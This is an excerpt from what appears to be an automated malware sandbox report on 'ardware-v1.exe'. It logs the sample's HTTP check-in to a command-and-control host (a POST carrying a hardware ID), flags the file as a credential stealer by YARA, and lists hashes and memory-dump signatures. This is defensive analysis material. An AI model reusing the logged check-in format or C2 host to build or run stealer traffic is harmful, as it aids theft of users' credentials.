10 | 192.168.2.5 | 49943 | 172.67.157.254 | 443 | 1972 | C:\Users\user\Desktop\ardware-v1.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 08:52:59 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 77
Host: lev-tolstoi.com
2024-12-18 08:52:59 UTC | 77 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 66 4c 38 72 65 2d 2d 26 6a 3d 26 68 77 69 64 3d 42 37 43 42 34 46 46 41 32 30 42 34 39 38 45 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
Data Ascii: act=get_message&ver=4.0&lid=tfL8re--&j=&hwid=B7CB4FFA20B498E6AC8923850305D13E
2024-12-18 08:52:59 UTC | 1038 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 08:52:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=u3gn23ditn93b4b4f34tger72l; expires=Sun, 13-Apr-2025 02:39:38 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QKivnV9jVutieqH%2FUwS6UpAU8iBfxcPYJDN4sTpgmTp%2BzygynFGWcEsw33DAhb1IKknxhhYhQbnlodZezuTHkgGLUbJiM7C%2Bagp9M3b4rncinJEiuUC%2FLj%2FEiJxb7ua8rYE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8f3deb7f2d1341c1-EWR
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1672&rtt_var=645&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=976&delivery_rate=1672394&cwnd=205&unsent_bytes=0&cid=9679aaeb3680ef13&ts=756&x=0"
                                                                                                                                                                                                                                    2024-12-18 08:52:59 UTC54INData Raw: 33 30 0d 0a 6d 2b 77 6e 50 44 56 46 67 65 32 49 50 35 67 6e 34 74 71 42 48 61 50 71 51 48 33 31 46 4c 56 63 55 2b 65 30 4b 45 61 47 33 35 6e 41 73 51 3d 3d 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 30m+wnPDVFge2IP5gn4tqBHaPqQH31FLVcU+e0KEaG35nAsQ==
                                                                                                                                                                                                                                    2024-12-18 08:52:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


Target ID: 0
Start time: 03:51:02
Start date: 18/12/2024
Path: C:\Users\user\Desktop\ardware-v1.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\ardware-v1.exe"
Imagebase: 0xf80000
File size: 3'487'960 bytes
MD5 hash: C491DDBA2EE7516CFC5D5B57ECE509A2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3121711204.0000000000B05000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3120968564.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3121039700.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3121763569.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Strings
Memory Dump Source
• Source File: 00000000.00000003.3121469673.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, Offset: 00AF6000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_af3000_ardware-v1.jbxd
Similarity
• API ID:
• String ID: a$i$s
• API String ID: 0-851615750
• Opcode ID: 611e7e3c170a10096eedb48ba709d6a87ea71bf8ac79f2beb7136969936e6eab
• Instruction ID: cfd347e55269de0062d19d3f9226324595f9bf20be80f9a9bf2f815f5caac7e3
• Opcode Fuzzy Hash: 611e7e3c170a10096eedb48ba709d6a87ea71bf8ac79f2beb7136969936e6eab
• Instruction Fuzzy Hash: 7A32739694E3C44FE31387709C69A963FB05F23248B4F42EBC0C4CB5E3E6589A59D762
Strings
Memory Dump Source
• Source File: 00000000.00000003.3121469673.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, Offset: 00AF3000, based on PE: false
• Associated: 00000000.00000003.3219399245.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_af3000_ardware-v1.jbxd
Similarity
• API ID:
• String ID: a$i$s
• API String ID: 0-851615750
• Opcode ID: 5eb32c174ab992003179815265fad2ac39dfb08efa968fa89705632c0ad70299
• Instruction ID: cfd347e55269de0062d19d3f9226324595f9bf20be80f9a9bf2f815f5caac7e3
• Opcode Fuzzy Hash: 5eb32c174ab992003179815265fad2ac39dfb08efa968fa89705632c0ad70299
• Instruction Fuzzy Hash: 7A32739694E3C44FE31387709C69A963FB05F23248B4F42EBC0C4CB5E3E6589A59D762
Strings
Memory Dump Source
• Source File: 00000000.00000003.3121469673.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, Offset: 00AF7000, based on PE: false
• Associated: 00000000.00000003.3219361874.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_af3000_ardware-v1.jbxd
Similarity
• API ID:
• String ID: a$i$s
• API String ID: 0-851615750
• Opcode ID: ec837ba0b66a3bef05005b2bdcf429e647225e17fe92ebac406debfedbf87803
• Instruction ID: cfd347e55269de0062d19d3f9226324595f9bf20be80f9a9bf2f815f5caac7e3
• Opcode Fuzzy Hash: ec837ba0b66a3bef05005b2bdcf429e647225e17fe92ebac406debfedbf87803
• Instruction Fuzzy Hash: 7A32739694E3C44FE31387709C69A963FB05F23248B4F42EBC0C4CB5E3E6589A59D762